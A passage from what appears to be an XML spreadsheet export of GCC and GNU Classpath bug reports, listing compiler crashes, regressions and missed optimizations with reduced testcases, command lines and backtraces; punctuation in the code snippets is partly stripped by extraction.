/Users/monaka/git/sourceforge.jp/pf3gnuchains4x/mpkg-darwin/m68k-elf/build/i386/./gcc/xgcc -B/Users/monaka/git/sourceforge.jp/pf3gnuchains4x/mpkg-darwin/m68k-elf/build/i386/./gcc/ -nostdinc -B/Users/monaka/git/sourceforge.jp/pf3gnuchains4x/mpkg-darwin/m68k-elf/build/i386/m68k-elf/newlib/ -isystem /Users/monaka/git/sourceforge.jp/pf3gnuchains4x/mpkg-darwin/m68k-elf/build/i386/m68k-elf/newlib/targ-include -isystem /Users/monaka/git/sourceforge.jp/pf3gnuchains4x/newlib/libc/include -B/Users/monaka/git/sourceforge.jp/pf3gnuchains4x/mpkg-darwin/m68k-elf/build/i386/m68k-elf/libgloss/m68k -L/Users/monaka/git/sourceforge.jp/pf3gnuchains4x/mpkg-darwin/m68k-elf/build/i386/m68k-elf/libgloss/libnosys -L/Users/monaka/git/sourceforge.jp/pf3gnuchains4x/libgloss/m68k -B/pizza/m68k-elf/bin/ -B/pizza/m68k-elf/lib/ -isystem /pizza/m68k-elf/include -isystem /pizza/m68k-elf/sys-include -L/Users/monaka/git/sourceforge.jp/pf3gnuchains4x/mpkg-darwin/m68k-elf/build/i386/./ld    -g -O2 -mcpu=51qe -O2  -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc  -I. -I. -I../../.././gcc -I../../../../../../../libgcc -I../../../../../../../libgcc/. -I../../../../../../../libgcc/../gcc -I../../../../../../../libgcc/../include  -DHAVE_CC_TLS -o _mulvdi3.o -MT _mulvdi3.o -MD -MP -MF _mulvdi3.dep -DL_mulvdi3 -c ../../../../../../../libgcc/../gcc/libgcc2.c \
../../../../../../../libgcc/../gcc/libgcc2.c: In function ï¿½e__mulvdi3ï¿½f:
../../../../../../../libgcc/../gcc/libgcc2.c:400:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-66056</t>
  </si>
  <si>
    <t>ICEs and endless compilation for lonely labels/numbers in type</t>
  </si>
  <si>
    <t>This code fragment with a lonely label in a type ...
   program p
      type t
      1 !
      end type
   end
or this variation ...
   program p
      type t
       1 
      end type
   end
produces (with gfortran 5.1.1 on SUSE Linux 13.2 64 bit)
internal compiler error: Segmentation fault
---
Similar but with a lonely real number instead ...
   program p
      type t
      1.2 !
      end type
   end
or this variation ...
   program p
      type t
       1.2 
      end type
   end
leads to ...
Warning: Ignoring statement label in empty statement at (1)
(null):0: confused by earlier errors bailing out
Kind regards.</t>
  </si>
  <si>
    <t>GCC-82743</t>
  </si>
  <si>
    <t>uncaught character truncation in derived type initialization</t>
  </si>
  <si>
    <t>Initializing a derived type with a character component with a string too long is not caught by -Wcharacter-truncation.
PROGRAM TEST
    TYPE A
        CHARACTER(LEN=1) :: C
    END TYPE A
    TYPE(A) :: A1
    A1=A(123)
    A1=A(C=123)
    A1%C=123
END PROGRAM TEST
compiling with gfortran 7.1.1 and -Wall -Wextra gives only one warning:
main.f95:8:14:
     A1%C=123
              1
Warning: CHARACTER expression will be truncated in assignment (1/3) at (1) [-Wcharacter-truncation]</t>
  </si>
  <si>
    <t>simon.kluepfel</t>
  </si>
  <si>
    <t>GCC-70904</t>
  </si>
  <si>
    <t>ICE: Max. number of generated reload insns per insn is achieved (90) with -fno-split-wide-types @ aarch64</t>
  </si>
  <si>
    <t>Created attachment 38393
reduced testcase
Compiler output:
$ aarch64-unknown-linux-gnu-gcc -O -fno-split-wide-types testcase.c 
testcase.c: In function 'foo':
testcase.c:8:1: internal compiler error: Max. number of generated reload insns per insn is achieved (90)
 }
 ^
0x9dafa9 lra_constraints(bool)
        /repo/gcc-trunk/gcc/lra-constraints.c:4440
0x9c63dc lra(_IO_FILE*)
        /repo/gcc-trunk/gcc/lra.c:2290
0x96de19 do_reload
        /repo/gcc-trunk/gcc/ira.c:5425
0x96de19 execute
        /repo/gcc-trunk/gcc/ira.c:5609
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ aarch64-unknown-linux-gnu-gcc -v               
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest-aarch64/bin/aarch64-unknown-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-235588-checking-yes-rtl-df-nographite-aarch64/bin/../libexec/gcc/aarch64-unknown-linux-gnu/7.0.0/lto-wrapper
Target: aarch64-unknown-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-checking=yesrtldf --without-cloog --without-ppl --without-isl --with-sysroot=/usr/aarch64-unknown-linux-gnu --target=aarch64-unknown-linux-gnu --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=aarch64-unknown-linux-gnu --with-ld=/usr/bin/aarch64-unknown-linux-gnu-ld --with-as=/usr/bin/aarch64-unknown-linux-gnu-as --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-235588-checking-yes-rtl-df-nographite-aarch64
Thread model: posix
gcc version 7.0.0 20160428 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-4476</t>
  </si>
  <si>
    <t>g++ does not parse the definition of friend function within a class properly</t>
  </si>
  <si>
    <t xml:space="preserve">	A definition of a friend function within a class body is wrongly
        interpreted as an abstract virtual function.
Release:
3.1 20011005 (experimental)
Environment:
System: Linux lnxnce-12 2.2.19 #1 Fri Sep 14 12:24:58 CEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /scratch/gcc/configure --prefix=/afs/mpa/data/martin/ugcc --enable-languages=c++ --enable-namespaces
How-To-Repeat:
	Compile the following:
class foo {
  friend void bar () {}
  foo baz () {}
}</t>
  </si>
  <si>
    <t>CLASSPATH-28028</t>
  </si>
  <si>
    <t>JTextArea performance issue</t>
  </si>
  <si>
    <t>The performance of JTextArea operations is very bad when the text becomes
large repainting and scrolling becomes intolerable at a few hundred lines
even if only a dozen lines are visible.
(BTW: another clipRect issue?)
See attached testcase.
 HelpViewer 
         setText() times in msec
         jamvm   cacao  jdk142       
nlines
    10      12       21      6
   100     156      180     15
  1000    4708     2489     69
  2000   17357     8206    132
  3000   37922    17471    140
 10000      --   159881    480
100000      --       --   1654</t>
  </si>
  <si>
    <t>GCC-3475</t>
  </si>
  <si>
    <t>fabs == identity (i.e. fabs broken)</t>
  </si>
  <si>
    <t>fabs.c ------------------------------------------------------------------------
#include 
#include 
int main() {
  double u = -5
  printf(%lf\nfabs(u))
  }
-------------------------------------------------------------------------------
compiling this program results (correctly) in 5.0000 when compiled with
gcc fabs.c -o fabs
and (incorrectly) in -5.00000 when compiled with
g++ fabs.c -o fabs
Release:
3.0
Environment:
System: Linux dendrite 2.4.4 #4 Don Mai 3 00:14:41 CEST 2001 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ./configure --prefix=/opt/gcc-3.0/</t>
  </si>
  <si>
    <t>GCC-80095</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE with this pointer in NSDMI</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE since GCC 5.1.0
(when compiled with -std=c++1y):
===========================
struct A
{
  void* p = this
}
void foo()
{
  const A
}
===========================
bug.cc: In function 'void foo()':
bug.cc:8:18: internal compiler error: in gimplify_expr at gimplify.c:11957
   const A
                  ^
0xaee4e1 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:11957
0xaead60 gimplify_addr_expr
        ../../gcc/gcc/gimplify.c:5859
0xaead60 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:11245
0xafd43b gimplify_modify_expr
        ../../gcc/gcc/gimplify.c:5457
0xaebd4c gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:11198
0xaeeca8 gimplify_stmt(tree_node** gimple**)
        ../../gcc/gcc/gimplify.c:6478
0xaeb2fa gimplify_cleanup_point_expr
        ../../gcc/gcc/gimplify.c:6230
0xaeb2fa gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:11574
0xaeeca8 gimplify_stmt(tree_node** gimple**)
        ../../gcc/gcc/gimplify.c:6478
0xaef8fd gimplify_compound_expr
        ../../gcc/gcc/gimplify.c:5715
0xaf60cf gimplify_modify_expr_rhs
        ../../gcc/gcc/gimplify.c:5069
0xafd2f1 gimplify_modify_expr
        ../../gcc/gcc/gimplify.c:5417
0xaebd4c gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:11198
0xaeeca8 gimplify_stmt(tree_node** gimple**)
        ../../gcc/gcc/gimplify.c:6478
0xaeb2fa gimplify_cleanup_point_expr
        ../../gcc/gcc/gimplify.c:6230
0xaeb2fa gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:11574
0xaeeca8 gimplify_stmt(tree_node** gimple**)
        ../../gcc/gcc/gimplify.c:6478
0xaea51b gimplify_statement_list
        ../../gcc/gcc/gimplify.c:1716
0xaea51b gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:11626
0xaeeca8 gimplify_stmt(tree_node** gimple**)
        ../../gcc/gcc/gimplify.c:6478
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-49723</t>
  </si>
  <si>
    <t>gcc.c-torture/compile/pr46934.c: ICE in do_SUBST at combine.c:707 at -O1 and above</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/   -O1  -w -c  -o pr46934.o /test/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/compile/pr
46934.c    (timeout = 300)
/test/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/compile/pr46934.c: In function 'caller':/test/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/compile/pr46934.c:17:1: internal c
ompiler error: in do_SUBST at combine.c:707</t>
  </si>
  <si>
    <t>GCC-5126</t>
  </si>
  <si>
    <t>m68k pic optimisation bug</t>
  </si>
  <si>
    <t>When generating PIC code for m68k under certain circumstances
gcc will load %a5 with the GOT address even if the reference
to global data in the function has been optimised away.
Unfortunately in this case %a5 is not saved in the function
prologue to non-pic callers which use %a5 will lose.
This bug has been reported before but as far as I can tell
there is no open PR and no apparent fix in gcc-current. See:
http://gcc.gnu.org/ml/gcc-bugs/1999-11n/msg00673.html.
Release:
gcc-2.95.3
Environment:
NetBSD/mvme68k
(Any m68k platform will be affected)
How-To-Repeat:
See http://gcc.gnu.org/ml/gcc-bugs/1999-11n/msg00673.html
for a very simple test case.</t>
  </si>
  <si>
    <t>GCC-28523</t>
  </si>
  <si>
    <t>[4.0 Regression] Throw of a derived class casted to its base class using a C-style cast</t>
  </si>
  <si>
    <t>The compiler generates the error:
a.cpp: In function int main():
a.cpp:6: internal compiler error: in stabilize_call at cp/tree.c:2248
For this code:
class A {}
class B : public A {}
int main()
{
	throw (A) B()
	return 0
}
Info:
gcc version 4.1.1
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.1.1-src/configure
Thread model: posix
Command line:
g++ -Wall -ansi -pedantic a.cpp</t>
  </si>
  <si>
    <t>m.faustino</t>
  </si>
  <si>
    <t>GCC-65701</t>
  </si>
  <si>
    <t>[5 Regression] r221530 makes 187.facerec drop with -Ofast -flto on bdver2</t>
  </si>
  <si>
    <t>+2015-03-20  Jan Hubicka  
+
+       * ipa-inline.c (can_inline_edge_p): Short circuit if inline_failed
+       already is final.
+       (ipa_inline): Recompute inline_failed codes.
+       * cif-code.def (FUNCTION_NOT_OPTIMIZED REDEFINED_EXTERN_INLINE
+       USES_COMDAT_LOCAL ATTRIBUTE_MISMATCH UNREACHABLE): Declare as 
+       CIF_FINAL_ERROR.
makes 187.facerec drop in http://gcc.opensuse.org/SPEC/CFP/sb-megrez-head-64/recent.html but only for LTO.
revision range is 221529 (good) 221531 (bad).</t>
  </si>
  <si>
    <t>CLASSPATH-27966</t>
  </si>
  <si>
    <t>ConfigFileParser#validateClassName(String)</t>
  </si>
  <si>
    <t>cn.split(.) in gnu.javax.security.auth.login.ConfigFileParser#validateClassName(String) may be incorrect. It should be \\..</t>
  </si>
  <si>
    <t>ujihara</t>
  </si>
  <si>
    <t>GCC-46621</t>
  </si>
  <si>
    <t>gimple.h includes tm.h</t>
  </si>
  <si>
    <t>GCC-44157</t>
  </si>
  <si>
    <t>[C++0x] GCC wrongly takes a std::initializer_list argument as non-deduced context</t>
  </si>
  <si>
    <t>This is well-formed but GCC does not like it
#include 
template
void f(T) { }
int main() {
  std::initializer_list a = { 0 }
  f(a)
}
main1.cpp: In function 'int main()':
main1.cpp:8:6: warning: deducing 'T' as 'std::initializer_list'
main1.cpp:4:6: warning:   in call to 'void f(T) [with T = std::initializer_list]'
main1.cpp:8:6: warning:   (you can disable this with -fno-deduce-init-list)
The FCD says that if the argument is an initializer list and the parameter is a T the parameter is a non-deduced context (14.8.2.1/1). In this code however the argument is not an initializer list (if called as f({0}) it would be). Consequently the warning is wrong.</t>
  </si>
  <si>
    <t>GCC-35429</t>
  </si>
  <si>
    <t>[4.2 regression] ICE with complex arithmetic</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE since GCC 4.1.0 when compiled
with -O:
====================================================
int foo(__complex__ int z0 __complex__ int z1)
{
  return z0 != 0 || z1 != 0
}
====================================================
bug.c: In function 'foo':
bug.c:3: internal compiler error: in build_int_cst_wide at tree.c:891
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-39371</t>
  </si>
  <si>
    <t>[4.3 Regression] Incorrectly rejects switch((unsigned int)boolvar)</t>
  </si>
  <si>
    <t>void foo(bool b)
{
    switch ((unsigned int)b) {
        case 1:
        case 2: 
    }
}
% g++ test.cc
test.cc: In function â€˜void foo(bool)â€™:
test.cc:6: error: duplicate case value
test.cc:5: error: previously used here
The bug only appears with casts to (unsigned int) or wider casts to (int) (unsigned short) etc. work as expected.
Reproduces with GCC versions 4.2.4 and 4.3.2.</t>
  </si>
  <si>
    <t>foo</t>
  </si>
  <si>
    <t>GCC-45789</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: tree code 'lang_type' is not supported in gimple streams with -flto when using __builtin_printf()</t>
  </si>
  <si>
    <t>Compiler output:
$ gcc -flto testcase.C       
testcase.C:6:19: internal compiler error: tree code 'lang_type' is not supported in gimple streams
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ gcc -fwhopr testcase.C
testcase.C:6:19: internal compiler error: tree code 'lang_type' is not supported in gimple streams
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
----- testcase.C -----
void foo ()
{
  __builtin_printf (0)
}
typedef int format
----------------------
Tested revisions:
r164561 - crash
r163636 - crash
r161659 - OK
r159696 - OK
4.5 r163761 - OK</t>
  </si>
  <si>
    <t>GCC-10114</t>
  </si>
  <si>
    <t>[3.2/3.3/3.4 regression] [Sparc] ICE when optimizing (mem_loc_descriptor at dwarf2out.c:7903)</t>
  </si>
  <si>
    <t>Confirmed with 3.2 CVS 20030209 3.3 CVS 20030314 HEAD 20030302.
This is a regression from gcc-2.95 and isn't fixed by gcc-snapshot
(20030118-1).  Compiling without optimization (-O0) makes the ICE go
away.  I've made the -save-temps output available here:
  http://people.debian.org/~troup/reference.i.gz
(It's 140k uncompressed so I haven't included in the report sorry)
| Automatic build of chrony_1.19-1 on vore by sbuild/sparc 1.170
| Build started at 20030128-2140
| ******************************************************************************
[...]
| ** Using build dependencies supplied by package:
| Build-Depends: debhelper libreadline4-dev
[...]
| gcc -Wmissing-prototypes -Wall -O2 -g  -DLINUX -DHAS_SPINLOCK_H -c reference.c
| reference.c: In function `REF_SetReference':
| reference.c:441: Internal compiler error in mem_loc_descriptor at dwarf2out.c:7903
| Please submit a full bug report
| with preprocessed source if appropriate.
| See  for instructions.
A complete build log can be found at
http://buildd.debian.org/build.php?arch=sparc&amp;pkg=chrony&amp;ver=1.19-1
Release:
unknown
Environment:
sparc-linux (Debian unstable)</t>
  </si>
  <si>
    <t>178909</t>
  </si>
  <si>
    <t>GCC-32796</t>
  </si>
  <si>
    <t>[4.3 Regression] internal compiler error: tree check: expected integer_type or enumeral_type or boolean_type or real_type have pointer_type in int_fits_type_p</t>
  </si>
  <si>
    <t>$ /usr/local/DIR/gcc-svn20070717/bin/gcc -Wp-MDdrivers/kvm/.mmu.o.d  -nostdinc -isystem /usr/local/DIR/gcc-svn20070717/lib/gcc/i686-pc-linux-gnu/4.3.0/include -D__KERNEL__ -Iinclude  -include include/linux/autoconf.h -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -O1 -pipe -msoft-float -mregparm=3 -freg-struct-return -mpreferred-stack-boundary=2  -march=athlon -ffreestanding -maccumulate-outgoing-args -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -Iinclude/asm-i386/mach-generic -Iinclude/asm-i386/mach-default -fno-omit-frame-pointer -fno-optimize-sibling-calls -fasynchronous-unwind-tables  -fno-stack-protector -Wdeclaration-after-statement -Wno-pointer-sign    -DKBUILD_STR(s)=#s -DKBUILD_BASENAME=KBUILD_STR(mmu)  -DKBUILD_MODNAME=KBUILD_STR(kvm) -c -o drivers/kvm/mmu.o drivers/kvm/mmu.c
drivers/kvm/mmu.c: In function â€˜nonpaging_mapâ€™:
drivers/kvm/mmu.c:831: internal compiler error: tree check: expected integer_type or enumeral_type or boolean_type or real_type have pointer_type in int_fits_type_p at tree.c:6198
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-72843</t>
  </si>
  <si>
    <t>[7 Regression] internal compiler error: in lra_set_insn_recog_data at lra.c:964</t>
  </si>
  <si>
    <t>On Linux/x86 when compiled with
-mtune=slm -O2 -march=i686 -msse2 -mfpmath=sse -m32
r239180 caused:
/export/gnu/import/git/gcc-regression/gcc/libquadmath/math/asinq.c: In function â€˜asinqâ€™:
/export/gnu/import/git/gcc-regression/gcc/libquadmath/math/asinq.c:254:1: internal compiler error: in lra_set_insn_recog_data at lra.c:964
 }
 ^
0x87ea563 lra_set_insn_recog_data(rtx_insn*)
	/export/gnu/import/git/gcc-regression/gcc/gcc/lra.c:962
0x87e8913 lra_get_insn_recog_data
	/export/gnu/import/git/gcc-regression/gcc/gcc/lra-int.h:487
0x87ebc17 lra_update_insn_regno_info(rtx_insn*)
	/export/gnu/import/git/gcc-regression/gcc/gcc/lra.c:1584
0x87ec0c0 lra_push_insn_1
	/export/gnu/import/git/gcc-regression/gcc/gcc/lra.c:1735
0x87ec0ef lra_push_insn(rtx_insn*)
	/export/gnu/import/git/gcc-regression/gcc/gcc/lra.c:1743
0x87ec1e4 push_insns
	/export/gnu/import/git/gcc-regression/gcc/gcc/lra.c:1786
0x87ec47b lra_process_new_insns(rtx_insn* rtx_insn* rtx_insn* char const*)
	/export/gnu/import/git/gcc-regression/gcc/gcc/lra.c:1844
0x8804827 remove_inheritance_pseudos
	/export/gnu/import/git/gcc-regression/gcc/gcc/lra-constraints.c:6352
0x880578b lra_undo_inheritance()
	/export/gnu/import/git/gcc-regression/gcc/gcc/lra-constraints.c:6672
0x87ed6bf lra(_IO_FILE*)
	/export/gnu/import/git/gcc-regression/gcc/gcc/lra.c:2423
0x87a3db0 do_reload
	/export/gnu/import/git/gcc-regression/gcc/gcc/ira.c:5384
0x87a4200 execute
	/export/gnu/import/git/gcc-regression/gcc/gcc/ira.c:5568
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-3875</t>
  </si>
  <si>
    <t>gcc 3.0 gets a segmentation fault when compiling C files generated by
the Mercury compiler.
The problem seems to be related to taking the address of an unreachable label.
Release:
3.0
Environment:
System: Linux mars 2.2.18pre21-ide #1 Sat Nov 18 19:41:46 EST 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --prefix=/usr/local/gcc-3.0
How-To-Repeat:
Compile the following file with `gcc -O'.
	extern void *dummy
	void foo (void) {
	  goto *
	label1:
	  dummy = 
	  return
	label2:
	  goto label2
	}
The result is a crash in cc1
	bash$ gcc -O bug.c
	bug.c: In function `foo':
	bug.c:9: Internal error: Segmentation fault
	Please submit a full bug report
	with preprocessed source if appropriate.
	See  for instructions.
The crash occurs in find_basic_blocks_1().
(gdb) list *$pc
0x8149da4 is in find_basic_blocks_1 (flow.c:873).
868                                  || GET_CODE (PATTERN (next)) ==
ADDR_DIFF_VEC))
869                       
870                     else if (GET_CODE (lab) == NOTE)
871                       
872                     else if (GET_CODE (NEXT_INSN (insn)) == JUMP_INSN
873                              &amp;&amp; find_reg_note (NEXT_INSN (insn) REG_LABEL
lab))
874                       
875                     else
876                       lvl = alloc_EXPR_LIST (0 XEXP (note 0) lvl)
877                   }
(gdb) p insn
$5 = 0x401675c0
(gdb) pr
(insn 15 27 0 (set (mem/f:SI (symbol_ref:SI (dummy)) 0)
        (label_ref:SI 19)) 35 {*movsi_1} (nil)
    (insn_list:REG_LABEL 19 (nil)))</t>
  </si>
  <si>
    <t>GCC-859</t>
  </si>
  <si>
    <t>sparc-specific pessimal code for simple loop</t>
  </si>
  <si>
    <t>This seems to be a sparc-specific problem.
The code in How-To-Repeat below contains a simple Fortran
style loop.  The inner loop is 8 highly wasteful instructions on the Sparc (sparc-sun-solaris2.5.1):
.LL6:
        sll     %i2 3 %i0
        ldd     [%i3+%i0] %f6
        add     %i2 1 %i2
        fmovs   %f6 %f2
        cmp     %i2 %i1
        fmovs   %f7 %f3
        bl      .LL6
        faddd   %f4 %f2 %f4
But on the ix86 the inner loop is much better with
only four instructions:
.L21:
        faddl   (%ecx%eax8)
        incl    %eax
        cmpl    %edx %eax
        jl      .L21
The slow Sparc code is also present in 2.95.2 (we get the
same 8-instruction loop).
I first encountered this problem when I was trying to see
why I was getting strange results from the Stepanov C++
abstraction penalty benchmark: on Sparc the simple loop
was generating much worse code than the abstract loops.
Release:
gcc version 2.97 20001120 (experimental)
Environment:
sparc-sun-solaris2.5.1
How-To-Repeat:
/* compile this code with -O2 on sparc compare with ix86 */
void check(double)
void test0(double* first double* last)
{
  int n pdiff = last - first
  double result = 0
  for (n = 0 n &lt; pdiff ++n) result += first[n]
  check(result)
}</t>
  </si>
  <si>
    <t>GCC-23060</t>
  </si>
  <si>
    <t>%VAL %REF and %DESCR constructs not implemented</t>
  </si>
  <si>
    <t>The %VAL construct is used for passing arguments by value rather than the 
usual by reference or descriptor. It is vital for interoperability with other
languages such as C.
This feature is available in g77:
http://gcc.gnu.org/onlinedocs/gcc-3.4.4/g77/_0025VAL_0028_0029.html#_0025VAL_0028_0029
My interest in this feature comes from the world of astronomy where we have
a large legacy code base (~1 Million SLOC) written in Fortran 77 (see
http://cvsweb.starlink.ac.uk) where this feature is used for efficiently
accessing large data arrays using mmap complex data structures and for
accessing dynamic memory.</t>
  </si>
  <si>
    <t>p.w.draper</t>
  </si>
  <si>
    <t>GCC-50737</t>
  </si>
  <si>
    <t>FAIL: Throw_3 -O3 execution generic dwarf2 EH problem?</t>
  </si>
  <si>
    <t>This problem shows on alphaev68-pc-linux-gnu as FAIL: Throw_3 -O3 execution - source compiled test in [1] but I believe that it points to generic problem in dwarf2 EH handling. It was uncovered by changing alpha target to use .cfi directives.
After java test throws an exception (through libjava/exception.cc) it calls _Unwind_RaiseException from _Jv_Throw. However one of the functions in unwind chain just before target function is defined as:
$_ZN7Throw_33fooEJiP6JArrayIiE..ng:
_ZN7Throw_33fooEJiP6JArrayIiE:
        .eflag 48
        .frame $300$260
$LFB3:
        .loc 1 38 0
        .cfi_startproc
        .prologue 0
$LVL2:
$LBB3:
        .loc 1 38 0
        ldl $08($17)
$LVL3:
        .loc 1 39 0
        addl $0$0$0
$LVL4:
        addl $31$0$0
$LBE3:
        ret $31($26)1
        .cfi_endproc
$LFE3:
This results in empty FDE:
00000030 00000010 00000034 FDE cie=00000000 pc=00000030..00000040
  DW_CFA_nop
  DW_CFA_nop
  DW_CFA_nop
The target function:
_ZN7Throw_34mainEJvP6JArrayIPN4java4lang6StringEE:
        .eflag 48
        .frame $3048$260
        .mask 0x4001e00-48
$LFB1:
        .loc 1 7 0
        .cfi_startproc
        .cfi_personality 0x9bDW.ref.__gcj_personality_v0
        .cfi_lsda 0x1b$LLSDA1
$LEHB0:
        ldah $290($27)         !gpdisp!8
        lda $290($29)          !gpdisp!8
$_ZN7Throw_34mainEJvP6JArrayIPN4java4lang6StringEE..ng:
        lda $30-48($30)
$LCFI4:
        .cfi_def_cfa_offset 48
defines correct .cfi_personality.
Tracing the unwinder through libbgcc/unwin.inc _Unwind_RaiseException shows:
(gdb) p cur_context
$29 = {reg = {0x11ff10e60 0x11ff10e68 0x11ff10e70 0x11ff10e78 0x11ff10e80 
    0x11ff10e88 0x11ff10e90 0x11ff10e98 0x11ff10ea0 0x11ff10ea8 
    0x11ff10eb0 0x11ff10eb8 0x11ff10ec0 0x11ff10ec8 0x11ff10ed0 
    0x11ff10ed8 0x11ff10ee0 0x11ff10ee8 0x11ff10ef0 0x11ff10ef8 
    0x11ff10f00 0x11ff10f08 0x11ff10f10 0x11ff10f18 0x11ff10f20 
    0x11ff10f28 0x11ff10f30 0x11ff10f38 0x11ff10f40 0x11ff10f48 0x0 0x0 
    0x11ff10f68 0x11ff10f70 0x11ff10f78 0x11ff10f80 0x11ff10f88 
    0x11ff10f90 0x11ff10f98 0x11ff10fa0 0x11ff10fa8 0x11ff10fb0 
    0x11ff10fb8 0x11ff10fc0 0x11ff10fc8 0x11ff10fd0 0x11ff10fd8 
    0x11ff10fe0 0x11ff10fe8 0x11ff10ff0 0x11ff10ff8 0x11ff11000 
    0x11ff11008 0x11ff11010 0x11ff11018 0x11ff11020 0x11ff11028 
    0x11ff11030 0x11ff11038 0x11ff11040 0x11ff11048 0x11ff11050 
    0x11ff11058 0x0 0x11ff10e50} cfa = 0x11ff110e0 ra = 0x1200009d4 
  lsda = 0x0 bases = {tbase = 0x0 dbase = 0x0 func = 0x2000189fc90} 
  flags = 4611686018427387904 version = 0 args_size = 0 
  by_value = '\000' }
(gdb) p cur_context
$30 = {reg = {0x11ff10e60 0x11ff10e68 0x11ff10e70 0x11ff10e78 0x11ff10e80 
    0x11ff10e88 0x11ff10e90 0x11ff10e98 0x11ff10ea0 0x11ff10ea8 
    0x11ff10eb0 0x11ff10eb8 0x11ff10ec0 0x11ff10ec8 0x11ff10ed0 
    0x11ff10ed8 0x11ff10ee0 0x11ff10ee8 0x11ff10ef0 0x11ff10ef8 
    0x11ff10f00 0x11ff10f08 0x11ff10f10 0x11ff10f18 0x11ff10f20 
    0x11ff10f28 0x11ff10f30 0x11ff10f38 0x11ff10f40 0x11ff10f48 0x0 0x0 
    0x11ff10f68 0x11ff10f70 0x11ff10f78 0x11ff10f80 0x11ff10f88 
    0x11ff10f90 0x11ff10f98 0x11ff10fa0 0x11ff10fa8 0x11ff10fb0 
    0x11ff10fb8 0x11ff10fc0 0x11ff10fc8 0x11ff10fd0 0x11ff10fd8 
    0x11ff10fe0 0x11ff10fe8 0x11ff10ff0 0x11ff10ff8 0x11ff11000 
    0x11ff11008 0x11ff11010 0x11ff11018 0x11ff11020 0x11ff11028 
    0x11ff11030 0x11ff11038 0x11ff11040 0x11ff11048 0x11ff11050 
    0x11ff11058 0x0 0x11ff10e50} cfa = 0x11ff110e0 ra = 0x120000af4 
  lsda = 0x0 bases = {tbase = 0x0 dbase = 0x0 func = 0x1200009d0} 
  flags = 4611686018427387904 version = 0 args_size = 0 
  by_value = '\000' }
where cfa of the former context shows cfa = 0x11ff110e0 that is equal to cfa from the later context. The return address (ra) from the former points to:
00000001200009d0 :
   1200009d0:	08 00 11 a0 	ldl	v08(a1)
   1200009d4:	00 00 00 40 	addl	v0v0v0
   1200009d8:	00 00 e0 43 	sextl	v0v0
   1200009dc:	01 80 fa 6b 	ret
and the return address of the later context points to:
0000000120000a64 :
   120000a64:	02 00 bb 27 	ldah	gp2(t12)
   120000a68:	2c 8d bd 23 	lda	gp-29396(gp)
   120000a6c:	d0 ff de 23 	lda	sp-48(sp)
   ...
   120000af0:	00 40 5b 6b 	jsr	ra(t12)120000af4 
   120000af4:	02 00 ba 27 	ldah	gp2(ra)
   120000af8:	9c 8c bd 23 	lda	gp-29540(gp)
   120000afc:	2e 00 e0 c3 	br	120000bb8 
   120000b00:	10 04 ff 47 	clr	a0
   ...
After _Unwind_RaiseException finds the personality routine in _ZN7Throw_34mainEJvP6JArrayIPN4java4lang6StringEE it records cfa of target function in exc-&gt;private2 and calls _Unwind_RaiseExcecption_Phase2 with this data. Unfortunately the cfa of target function (_ZN7Throw_34mainEJvP6JArrayIPN4java4lang6StringEE) matches the cfa of function just before in the chain namely _ZN7Throw_33fooEJiP6JArrayIiE !
